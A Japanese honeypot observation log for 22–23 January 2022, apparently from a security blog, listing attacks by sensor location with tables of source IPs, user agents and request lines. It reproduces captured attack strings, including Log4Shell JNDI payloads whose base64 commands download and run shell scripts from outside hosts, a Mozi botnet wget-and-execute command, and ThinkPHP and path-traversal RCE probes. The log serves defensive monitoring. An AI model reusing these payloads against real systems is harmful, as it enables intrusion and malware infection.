コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/01/23 ハニーポット(仮) 観測記録

ハニーポット(仮) 観測記録 2022/01/23分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
/.envへのスキャン行為
Laravelへのスキャン行為

Location:JP
Location:US

ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:UK

ThinkPHPの脆弱性を狙うアクセス
ZhiyuanOAの脆弱性を狙うアクセス
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://219.85.234.54:52194/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
161.97.119.209に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

アクセス数推移

JP:総アクセス数:63 (前日比:-349)
US:総アクセス数:222 (前日比:-5)
UK:総アクセス数:169 (前日比:113)
SG:総アクセス数:65 (前日比:-8)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 20.106.144.172 United States
1 20.115.36.48 United States
1 24.173.125.28 United States
2 45.137.21.134 Bangladesh
7 45.146.165.37 Russia
1 47.241.126.224 United States
1 61.219.11.151 Taiwan
1 81.163.14.180 Poland
2 107.189.12.178 United States
2 107.189.29.181 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 115.58.93.104 China
4 128.14.209.162 United States
1 128.199.1.35 United Kingdom
19 135.125.244.48 France
1 139.162.145.250 Netherlands
1 159.203.160.245 United States
1 159.223.171.171 United States
4 173.255.252.153 United States
1 185.254.196.217 Ukraine
5 185.254.196.218 Ukraine
1 206.189.226.24 United States
1 209.17.97.114 United States
1 209.141.54.110 United States
1 212.193.30.115 Czechia

UserAgent一覧

件数 UserAgent
6 -
4 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
3 Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)
31 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2
1 python-requests/2.26.0
1 python-requests/2.27.1
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13[.]78[.]223[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 \x16\x03\x01\x01\xfa\x01
2 \x16\x03\x01
31 GET /.env HTTP/1.1
1 GET /:undefined HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
3 GET /_ignition/execute-solution HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
2 GET /dispatch.asp HTTP/1.1
3 GET /trace HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
4 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
3 2.57.169.175 Netherlands
1 13.64.133.172 United States
2 20.119.80.118 United States
6 23.94.104.70 United States
1 34.75.220.108 United States
1 34.96.130.20 United States
1 40.71.94.224 United States
2 45.137.21.134 Bangladesh
9 45.146.165.37 Russia
5 51.79.29.48 Canada
1 59.36.168.250 China
1 61.219.11.151 Taiwan
1 62.171.147.55 Germany
4 80.82.77.139 United Kingdom
1 87.251.64.136 Russia
2 89.248.165.23 United Kingdom
1 89.248.165.24 United Kingdom
2 94.232.43.63 Russia
1 104.196.98.126 United States
1 107.189.28.51 United States
2 107.189.29.181 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
1 114.134.26.40 India
10 120.78.228.152 China
4 128.14.209.162 United States
1 137.184.184.243 United States
4 137.184.221.114 United States
1 139.162.145.250 Netherlands
2 157.245.70.127 United States
1 159.203.160.245 United States
2 159.223.171.171 United States
1 159.223.183.235 United States
4 164.52.24.179 China
4 185.163.109.66 Romania
1 206.189.226.57 United States
1 209.17.96.58 United States
1 209.141.54.110 United States
1 211.52.37.105 South Korea
133 222.35.94.249 China

UserAgent一覧

件数 UserAgent
24 -
1 Go-http-client/1.1
3 Mozila/5.0
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
3 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
6 Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
132 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
16 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2
1 python-requests/2.27.1
3 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13[.]78[.]223[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g7IHRmdHAgNTEuMTYxLjY0LjE5OCAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgNTEuMTYxLjY0LjE5ODsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=}')
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')

リクエスト内容一覧

件数 Method Request Protocol
2 -
6 \x03
1 \x16\x03\x01\x01 \x01
5 \x16\x03\x01
16 GET /.env HTTP/1.1
2 GET /.well-known/security.txt HTTP/1.1
4 GET /:undefined HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IGN1cmwgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoIC1vIGJpbnMuc2g7IHdnZXQgaHR0cDovLzE0NS4yMzkuMjM0LjE1NC9iaW5zLnNoOyBjaG1vZCA3NzcgYmlucy5zaDsgLi9iaW5zLnNoOyBybSAtcmYgYmlucy5zaDsgaGlzdG9yeSAtYw==%7D%27) HTTP/1.1
1 GET /?id=t(%27$%7B$%7Benv:BARFOO:-j%7Dndi$%7Benv:BARFOO:-:%7D$%7Benv:BARFOO:-l%7Ddap$%7Benv:BARFOO:-:%7D//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g7IHRmdHAgNTEuMTYxLjY0LjE5OCAtYyBnZXQgdGZ0cDEuc2g7IGNobW9kIDc3NyB0ZnRwMS5zaDsgc2ggdGZ0cDEuc2g7IHRmdHAgLXIgdGZ0cDIuc2ggLWcgNTEuMTYxLjY0LjE5ODsgY2htb2QgNzc3IHRmdHAyLnNoOyBzaCB0ZnRwMi5zaDsgcm0gLXJmICo=%7D%27) HTTP/1.1
2 GET /MyAdmin/index.php?lang=en HTTP/1.1
2 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
2 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
4 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
2 GET /PMA2021/index.php?lang=en HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
2 GET /_ignition/execute-solution HTTP/1.1
2 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_profiler/phpinfo HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
2 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
2 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
3 GET /administrator/pma/index.php?lang=en HTTP/1.1
2 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /bag2 HTTP/1.1
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
2 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
2 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /debug/default/view?panel=config HTTP/1.1
2 GET /dispatch.asp HTTP/1.1
1 GET /elrekt.php HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
2 GET /mysql/admin/index.php?lang=en HTTP/1.1
2 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
2 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
5 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
2 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
3 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
2 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
2 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
3 GET /pma2018/index.php?lang=en HTTP/1.1
3 GET /pma2020/index.php?lang=en HTTP/1.1
2 GET /pma2021/index.php?lang=en HTTP/1.1
3 GET /program/index.php?lang=en HTTP/1.1
1 GET /public/index.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
2 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
3 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
2 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
2 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1
1 HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1
1 HEAD /icons/sphere1.png HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
3 POST /HNAP1/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
6 POST /_ignition/execute-solution HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 POST /result%3Fhl%3Den%26meta%3Dvvnwppnloxhwtqccppbyhqmrwyswqen HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 36.37.140.88 Cambodia
1 42.231.65.10 China
2 45.137.21.134 Bangladesh
10 45.146.165.37 Russia
1 66.240.205.34 United States
1 85.174.195.185 Russia
1 107.189.28.51 United States
1 109.237.103.9 Russia
1 109.237.103.123 Russia
2 124.71.157.225 China
4 128.1.248.26 United States
1 139.59.56.185 Singapore
2 157.245.70.127 United States
1 159.203.160.245 United States
3 159.223.171.171 United States
133 187.103.207.172 Brazil
1 209.17.97.10 United States
1 209.141.54.110 United States
1 219.85.234.54 Taiwan
1 219.157.202.116 China

UserAgent一覧

件数 UserAgent
8 -
1 Hello, World
1 Hello, world
1 Mozila/5.0
4 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
10 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
132 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
3 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2
1 python-requests/2.25.1
1 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//13[.]78[.]223[.]142:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')
2 t('${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//5[.]181[.]80[.]103:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCBjZCAvdmFyL3J1biB8fCBjZCAvbW50IHx8IGNkIC9yb290IHx8IGNkIC87IHdnZXQgaHR0cDovLzUxLjE2MS42NC4xOTgvaW5zdGFsbC5zaDsgY2htb2QgNzc3IGluc3RhbGwuc2g7IHNoIGluc3RhbGwuc2g=}')

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 Gh0st\xad
1 \x16\x03\x01\x01\xfc\x01
1 \x16\x03\x01
3 GET /.env HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
3 GET /:undefined HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
2 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
2 GET /PMA2013/index.php?lang=en HTTP/1.1
2 GET /PMA2015/index.php?lang=en HTTP/1.1
4 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
3 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
2 GET /admin/index.php?lang=en HTTP/1.1
2 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
2 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /config/getuser?index=0 HTTP/1.1
1 GET /console/ HTTP/1.1
2 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
3 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
2 GET /db/index.php?lang=en HTTP/1.1
2 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /dispatch.asp HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
2 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
3 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
2 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-4.9.7-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0-english/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /phpMyadmin/index.php?lang=en HTTP/1.1
2 GET /phpmy/index.php?lang=en HTTP/1.1
2 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
2 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
3 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
2 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /pma2021/index.php?lang=en HTTP/1.1
4 GET /program/index.php?lang=en HTTP/1.1
1 GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//219[.]85[.]234[.]54:52194/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
2 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
3 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
